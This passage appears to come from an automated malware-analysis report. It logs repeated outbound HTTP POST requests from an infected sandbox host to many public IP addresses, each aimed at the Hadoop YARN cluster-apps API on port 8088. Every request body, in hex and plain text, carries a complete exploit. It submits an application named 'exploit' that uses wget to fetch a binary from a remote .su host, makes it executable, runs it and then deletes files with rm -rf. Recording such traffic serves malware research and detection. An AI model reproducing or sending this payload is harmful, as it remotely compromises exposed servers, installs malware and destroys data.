                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:35.144198895 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 61.221.100.106:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:37.607888937 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 61.221.100.106:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:42.727181911 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 61.221.100.106:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                22192.168.2.2355228184.87.98.2228088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:41.869534969 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 184.87.98.222:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:42.279247999 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 184.87.98.222:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                23192.168.2.235404081.209.218.538088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:50.875025988 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 81.209.218.53:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                24192.168.2.2352146197.159.201.2498088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:53.878185034 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 197.159.201.249:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:54.214703083 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 197.159.201.249:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:54.539369106 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 197.159.201.249:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                25192.168.2.2343392192.126.40.2398088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:59.881345987 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 192.126.40.239:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:00.580811024 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 192.126.40.239:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:01.284791946 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 192.126.40.239:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                26192.168.2.2351444204.235.25.1858088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:05.884020090 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 204.235.25.185:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:06.180124044 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 204.235.25.185:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:06.467984915 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 204.235.25.185:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:07.043893099 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 204.235.25.185:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:08.195836067 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 204.235.25.185:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:10.627443075 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 204.235.25.185:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
